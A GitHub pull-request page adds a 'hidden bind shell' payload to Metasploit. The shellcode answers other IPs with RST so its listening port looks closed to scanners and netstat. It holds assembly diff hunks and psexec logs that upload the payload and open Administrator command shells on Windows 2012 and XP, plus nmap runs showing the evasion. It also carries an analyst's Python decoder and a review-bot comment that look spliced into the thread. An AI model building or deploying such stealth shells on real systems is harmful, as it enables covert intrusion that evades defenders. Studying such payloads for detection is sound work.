hidden single bind shell payload #3017

Merged
merged 1 commit into from Jun 8, 2014

4 participants

@BorjaMerino

This is another alternative to the acl_bind_shell (#2981). In this case, the shellcode will reply with a RST packet to any connection attempt started from an IP different than the one you set with AHOST; so the socket will appear as "closed". This is a good way to keep your shellcode hidden from scanning tools (in win XP even from netstat -an)

I've used the setsockopt() API with SO_CONDITIONAL_ACCEPT and WSAAccept() to allow the shellcode to approve the connection based on the source address.

I used the shell_bind_tcp of Stephen Fewer to add such functionality. This will mean an increase of 54 bytes (34 more than the ACL bind shell). Any shellcode optimization is welcome.

More info:
http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html
http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1
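To make the byte order behind the `sub eax, 0x2101A8C0` check in the condition function concrete, and to give an analyst a way to recover the whitelisted client IP from a captured sample, here is an added Python helper. It is not part of this PR or of Metasploit; the sample blob is constructed, and the opcode pattern assumes the two `mov eax, [eax+4]` loads followed by `sub eax, imm32` exactly as the diff shows them.

```python
import re
import socket
import struct

# Opcode bytes for the instruction sequence in the condition function:
#   mov eax, DWORD [eax+4]   8B 40 04
#   mov eax, DWORD [eax+4]   8B 40 04
#   sub eax, imm32           2D <4-byte immediate>
# The immediate is captured so it can be decoded. DOTALL lets '.' match 0x0A.
CONDITION_PATTERN = re.compile(rb"\x8b\x40\x04\x8b\x40\x04\x2d(.{4})", re.DOTALL)


def imm32_for_ip(dotted: str) -> int:
    """Immediate that `sub eax, imm32` needs so that eax becomes zero for this
    client: eax holds sin_addr read as an x86 little-endian DWORD."""
    packed = socket.inet_aton(dotted)      # network byte order, e.g. c0 a8 01 21
    return struct.unpack("<I", packed)[0]  # same bytes read as little-endian int


def allowed_ips_in(blob: bytes) -> list:
    """Return every allowed-client IP embedded in a payload blob, found by
    locating the compare sequence and decoding its 4-byte immediate."""
    found = []
    for match in CONDITION_PATTERN.finditer(blob):
        imm_bytes = match.group(1)              # stored in instruction order
        found.append(socket.inet_ntoa(imm_bytes))  # identical to sin_addr order
    return found


# Constructed sample (not real payload output): filler, the compare sequence
# with the page's constant 0x2101A8C0, then jz/xor/inc/retn as in the diff.
SAMPLE = (
    b"\x90\x90"
    + b"\x8b\x40\x04\x8b\x40\x04"
    + b"\x2d" + struct.pack("<I", 0x2101A8C0)
    + b"\x74\x03\x31\xc0\x40\xc2\x20\x00"
)

if __name__ == "__main__":
    print(hex(imm32_for_ip("192.168.1.33")))  # 0x2101a8c0
    print(allowed_ips_in(SAMPLE))             # ['192.168.1.33']
```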

@wvu-r7

You have excellent taste in electronic music, @BorjaMerino. :P

@BorjaMerino

@wvu-r7 thank you :) Hope people enjoy the payload. Surely the shellcode is more tunable.

@schierlm schierlm commented on an outdated diff Mar 6, 2014
...lcode/windows/x86/src/block/block_hidden_bind_tcp.asm
+ mov eax, DWORD [eax+4] ;
+ mov eax, DWORD [eax+4] ; get the client IP returned in the stack
+ sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed
+ jz return ; if equal returns CF_ACCEPT
+ xor eax, eax ; If not equal, the condition function returns CF_REJECT
+ inc eax
+return:
+ retn 0x20 ; some stack alignment needed to return to mswsock
+
+wsaaccept:
+ push ebx ; length of the sockaddr = nul
+ push ebx ; struct sockaddr = nul
+ push edi ; socket descriptor
+ push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
+ call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
+ cmp eax, -1 ; if error jump to condition function to wait for another connection
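Review bot: the first `mov eax, DWORD [eax+4]` in this hunk has an empty comment, so a reader cannot tell what the two loads walk; state it (the caller-id WSABUF's buf pointer, then the sin_addr field of the sockaddr it points to, which is what the eight-argument condition-function signature behind `retn 0x20` implies). Also, the allowed address is a bare immediate in `sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed`; since the generator has to patch this from AHOST, note the offset or a marker in the comment so the patch site is not lost when the block is re-optimized.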
@schierlm
schierlm added a note Mar 6, 2014

inc eax will also set ZF if eax = -1. You'll have to dec eax again after the conditional jump, but you'll still save one byte as the cmp needs 3 bytes.

@BorjaMerino

@schierlm change added. Thank you :)

@Meatballs1

This doesn't need a new handler, as it doesn't do anything differently than the BindTcp handler.

It would be good if you could specify the source IP via the handler (e.g. to match AHOST)? If not this isn't required.

@Meatballs1

Versus 2012:

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.3:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \iYotEyOb.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.3[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.3[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (iaQdgCPb - "MrrBEfxnSPLiiaoRtHSRaWui")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \iYotEyOb.exe...
[*] Command shell session 1 opened (192.168.1.100:60995 -> 192.168.1.3:4444) at 2014-06-08 13:39:00 +0100

Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

XP

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.8:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \IMydbOmZ.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (fTbnKJrT - "Mw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \IMydbOmZ.exe...
[*] Command shell session 2 opened (192.168.1.100:54969 -> 192.168.1.8:4444) at 2014-06-08 13:41:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Incorrect AHOST:

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.8:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \KBHHaTHk.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OmvBZcyO - "MvYRJy")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KBHHaTHk.exe...

Incorrect IP:

nmap -n -p6666 192.168.1.8

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-08 13:46 BST
Nmap scan report for 192.168.1.8
Host is up (0.0039s latency).
PORT     STATE  SERVICE
6666/tcp closed irc
MAC Address: 00:0C:29:A6:71:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Correct IP:

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-08 13:46 BST
Nmap scan report for 192.168.1.8
Host is up (0.0011s latency).
PORT     STATE SERVICE
6666/tcp open  irc
MAC Address: 00:0C:29:A6:71:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
@Meatballs1 Meatballs1 merged commit 5881f94 into rapid7:master Jun 8, 2014

1 check passed

Details continuous-integration/travis-ci The Travis CI build passed
@Meatballs1 Meatballs1 added a commit that referenced this pull request Jun 8, 2014
@Meatballs1 Meatballs1 Land #3017, Windows x86 Shell Hidden Bind
A bind shellcode that responds as 'closed' unless the client matches the
AHOST ip.
25ed68a